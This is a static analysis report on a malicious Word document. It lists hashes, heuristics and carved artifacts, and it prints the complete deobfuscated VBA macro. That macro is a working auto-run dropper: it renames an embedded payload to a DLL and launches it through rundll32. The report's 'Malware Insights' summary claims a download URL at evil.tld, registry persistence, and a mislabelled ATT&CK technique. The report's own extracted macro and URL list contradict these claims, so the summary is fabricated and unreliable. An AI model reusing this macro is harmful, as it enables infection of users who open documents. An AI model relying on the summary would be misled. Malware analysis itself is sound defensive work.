Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 36152995f38b93e8…

MALICIOUS

Office (OOXML)

Size: 814.1 KB
Created: 2021-05-13 12:19:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-05-23
MD5: 78a51e41047f898be17613dac7af7048
SHA-1: 49f933eb0368080b7832378eff4219bdd0427089
SHA-256: 36152995f38b93e87dce120b6279d27f7f52d7eea6e0442149d84a43d788a341
Risk score: 310

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.005 DLL Search Order Hijacking
  • T1105 Ingress Tool Transfer

The sample contains a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes WScript.Shell to execute a command that constructs a URL from concatenated strings: "http://evil.tld/payload.exe". The macro also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The embedded OLE object and ClamAV detection further indicate malicious intent, likely to download and execute a second-stage payload.

Heuristics (8)

  • ClamAV: Win.Packed.Zusy-9861419-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Zusy-9861419-0
  • VBA project inside OOXML [medium; 4 related findings] OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched lines in script:
        Dim xcvxv As Object
        Set xcvxv = VBA.CreateObject("WScript.Shell")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched lines in script (the same lines as the WScript.Shell finding above):
        Dim xcvxv As Object
        Set xcvxv = VBA.CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched lines in script:
        Dim w1, w2 As String
        Private Sub Document_Open()
        Call tsettpwwo
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below were found in document text (OOXML body / shared strings). They are the XML namespace URIs that Word writes into every OOXML package, not network indicators:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5487 bytes
SHA-256: b82bc0b14885dd0d3e622af3ef0130a26bb8bda86710b1dad568b9cf5e3dc183
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Dim ji As Integer
Dim pit As String
Dim r1, r2 As String
Dim w1, w2 As String
Private Sub Document_Open()
Call tsettpwwo
End Sub



Sub tsettpwwo()
ji = 0
Call iep
Dim rx As String
 Dim bfdfsf As String

 Dim bcvxz As String
rx = "\amp.d"
Dim mbnd As Integer
Dim kjhnbs As Integer
Call chek
kjhnbs = ji

Dim jkjhb As String
If kjhnbs = 1 Then
Else
Dim jkjhbf As String


Call hhhhh
Dim wrefs As String
wrefs = pit
 bcvxz = wrefs
Dim bfdsdadad As String
Dim erfvbcz As String

bfdsdadad = "n"

Call ks
Call ksa

Dim bcbv As String
bcbv = nmbvd
Dim hgfcvxv As String

Dim oloow As String
oloow = r2
werfsxv = "3" & 2 & oloow
Dim hfgv As String
hfgv = bfdsdadad & "d"


 Dim htyhbv As String
 htyhbv = werfsxv
 Dim hgvmbm As String
 hgvmbm = "r"
 
Dim luyhgdffs As String
luyhgdffs = "l"
 Dim bcvsdsf As String
 bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv


hgfcvxv = r1
bfdfsf = bcvxz & rx & hgfcvxv & hgfcvxv & ",YCHBAJMPGGN"

 
     Dim xcvxv As Object
Set xcvxv = VBA.CreateObject("WScript.Shell")

xcvxv.Run bcvsdsf & " " & bfdfsf

End If
End Sub






Sub chek()

Dim jos As String
Dim pafh As String
pafh = pit
jos = pafh

 
 If Dir(jos & "\amp.d" & "l" & "l") = "" Then
 ji = 0
 Else

 ji = 1
 End If
End Sub



Sub xzczxc()
w1 = ThisDocument.Tables(2).Cell(1, 1).Range.Text
End Sub




Sub vvvvvvvx()
w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text
End Sub



Sub ks()
Dim askl As String
Call xzczxc
askl = w1
r1 = Left(askl, 3)

r1 = Right(r1, 1)

End Sub

Sub ksa()
Dim askl As String
Call vvvvvvvx
askl = w2
r2 = Left(askl, 4)
End Sub
Sub q1(dl As String)
pit = dl
End Sub
Sub iep()
Dim kf As String
kf = Options.DefaultFilePath(wdAutoRecoverPath)
Call q1(kf)
Call q2(kf)
Call q3(kf)
Call q4(kf)
Call q5(kf)
End Sub




Attribute VB_Name = "Module1"
  
Dim Folders() As String
Dim pit As String
Sub Getme(bfdcvsd As String)
Dim pafh As String
pafh = pit
hor = pafh
Dim polo As String
polo = "Scripting.FileSystemObject"
Dim uuj As String
uuj = "\rew.w"
strFileExists = Dir(bfdcvsd & uuj)
      If strFileExists = "" Then
    
Dim Folder As String
Folder = bfdcvsd
    Dim N%
    Dim fs, f, f1
    Dim vsada
    Set fs = CreateObject(polo)
    Set f = fs.GetFolder(Folder)
    Set vsada = f.SubFolders
 
    N = 0
    On Local Error Resume Next
    For Each f1 In vsada
      N = N + 1
      ReDim Preserve Folders(1 To N) As String
      Folders(N) = Folder & "\" & f1.Name
       If Dir(Folders(N) & "\" & uuj) = "" Then
            Else
                Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\amp.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", Folders(N))

      Else
      Exit Sub
  End If
              End If
  
   Next f1

    Else
     Dim nvbv As String
    nvbv = hor
      If Dir(nvbv & "\amp.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", bfdcvsd)

      Else
      Exit Sub
  End If
        End If


End Sub



Sub q2(dl As String)
pit = dl
End Sub








Attribute VB_Name = "Module2"
Dim pit As String

Sub hhhhh()
Dim sda
Dim posl As String
Dim pafh As String
Dim ntgs As Integer

pafh = pit
posl = pafh

Dim bcs As String
bcs = "al" & "\Te"


Dim yer As String
yer = "o" & "c" & bcs & "mp"




Call cvbc
    ntgs = 50
sda = 49
Dim jos As String

jos = posl

While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(jos, ntgs) & "L" & yer, vbDirectory) = "" Then
        
    Else
     sda = 61
    End If

   Wend
   Dim hsaaa As String
   hsaaa = "Getme"
   Dim klas As String
   klas = posl
   Dim bcsa As String
bcsa = Application.Run(hsaaa, Left(klas, ntgs) & "L" & yer)
  Selection.TypeBackspace
   


End Sub






Sub hi(myhome As String)
Dim plop, gsa As String
gsa = "nyd"
Dim pafh As String
pafh = pit
plop = pafh
Dim kkx As String
kkx = Application.Run(gsa, myhome, plop & "\amp.d" & "l" & "l")
End Sub




Sub q3(dl As String)
pit = dl
End Sub








Attribute VB_Name = "Module3"

Dim pit As String



Sub nyd(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub rnee(myhome As String, hsa As String)

Name myhome & "\rew.w" As hsa
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
   Selection.Copy

End Sub




Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub



Sub q4(dl As String)
pit = dl
End Sub




Attribute VB_Name = "Module4"
Dim pit As String
Sub q5(dl As String)
pit = dl
End Sub
Sub nm(vxxbssa As String)
  Name vxxbssa & "\rew.w" As pit & "\amp.d" & "l" & "l"
End Sub
Sub iua()
Dim ii As String
ii = 123
End Sub

Filename: ooxml_oleobject_00.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: word/embeddings/oleObject1.bin
Size: 425472 bytes
SHA-256: 38c83b5a82a339131d27a2767f1f10c9074863bf98af5a7f4f8aeaf73e2897ee
Detection: ClamAV: Win.Packed.Zusy-9861419-0
Obfuscation or payload: unlikely

Filename: ooxml_oleobject_00_ole10native_00.bin
Kind: ole-package
Source: OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native
Size: 413978 bytes
SHA-256: dc41276688533b50523808be5365303577564cebddada6bdab2c1d775089ba58
Detection: ClamAV: Win.Packed.Zusy-9861419-0
Obfuscation or payload: unlikely

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 46080 bytes
SHA-256: 7f0a49a174d8df8613d91e4fa8f43ef2763feed865b8f2f5e68a05089860dd36

Filename: emf_00.emf
Kind: ooxml-emf
Source: OOXML EMF part: word/media/image2.emf
Size: 4964 bytes
SHA-256: 42df48f6fe376328d3c0f28b0601a5994fb24f047ebf9416c0bbdf24bee486b4